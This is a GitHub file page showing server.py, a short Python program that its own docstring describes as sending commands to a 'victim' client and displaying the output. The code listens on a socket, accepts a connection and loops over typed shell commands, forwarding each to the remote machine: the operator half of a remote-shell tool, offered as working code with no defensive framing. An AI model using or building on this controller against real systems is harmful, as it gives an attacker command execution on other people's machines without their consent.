-
-
Notifications
You must be signed in to change notification settings - Fork 16
/
Copy pathserver.py
executable file
·60 lines (46 loc) · 1.72 KB
/
server.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
#!/usr/bin/env python
# -*-coding:utf-8 -*-
'''
@File : server.py
@Time : 2021/06/02 19:09:40
@Author : Shanto Roy
@Version : 1.0
@Contact : sroy10@uh.edu
@Desc : Server Program that sends command to the client (victim) and shows output
'''
import socket
class Server:
def __init__(self, host_ip, host_port):
self.host_ip = host_ip
self.host_port = host_port
def start_conn(self):
print("####################################")
print("######### Server Program #########")
print("####################################")
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((self.host_ip,self.host_port))
print("Msg: Server Initiated...")
print("Msg: Listening to the Client")
server.listen(1)
self.client, self.client_addr = server.accept()
print("Msg: Received Connection from", self.client_addr)
def online_interaction(self):
while True:
interface = '[+] '+ str(self.client_addr[0]) + " :sh$ "
command = input(interface)
print(command)
self.client.send(command.encode())
recv_data = self.client.recv(1024).decode()
if recv_data == b"":
continue
print("\n", recv_data, "\n")
def offline_interaction(self,list_of_commands):
self.client.send(str(list_of_commands).encode())
recv_data = self.client.recv(1024).decode()
print("Received output data from Client\n\n")
print(recv_data)
if __name__ == '__main__':
server = Server('127.0.0.1', 4000)
server.start_conn()
server.online_interaction()
# server.offline_interaction(["ls", "pwd"])